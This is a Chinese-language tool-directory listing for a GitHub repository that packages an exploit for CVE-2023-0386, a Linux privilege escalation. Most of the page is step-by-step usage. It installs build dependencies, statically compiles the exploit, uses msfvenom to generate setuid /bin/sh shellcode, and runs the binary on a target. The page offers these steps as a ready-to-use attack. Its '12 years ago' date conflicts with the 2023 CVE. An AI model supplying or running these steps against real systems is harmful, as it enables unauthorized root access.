Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-0386-libs — CVE-2023-0386 包含所需运行库 | Kitploit
工具/GitHubGitHub/estamelgg/cve-2023-0386-libs
权限提升Payload生成漏洞分析漏洞利用Shellcode渗透测试二进制利用
GitHubestamelgg/cve-2023-0386-libs

CVE-2023-0386-libs

CVE-2023-0386 包含所需运行库

查看仓库
12年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

安装编译环境

root@kitploit:~
sudo apt install -y gcc libfuse-dev pkg-config

编译 exp

root@kitploit:~
gcc -Wall CVE-2023-0386.c `pkg-config fuse --cflags --libs` -D_FILE_OFFSET_BITS=64 -o CVE-2023-0386-exp -static -lfuse

生成 shellcode

root@kitploit:~
msfvenom -p linux/x86/exec CMD=/bin/sh PrependSetuid=True -f elf -o shellcode.elf && xxd -i -c 8 shellcode.elf

xxd -i -c 8 shellcode.elf

目标执行,不需要要求目标安装 gcc 等环境

root@kitploit:~
chmod +x CVE-2023-0386-exp && ./CVE-2023-0386-exp
下载工具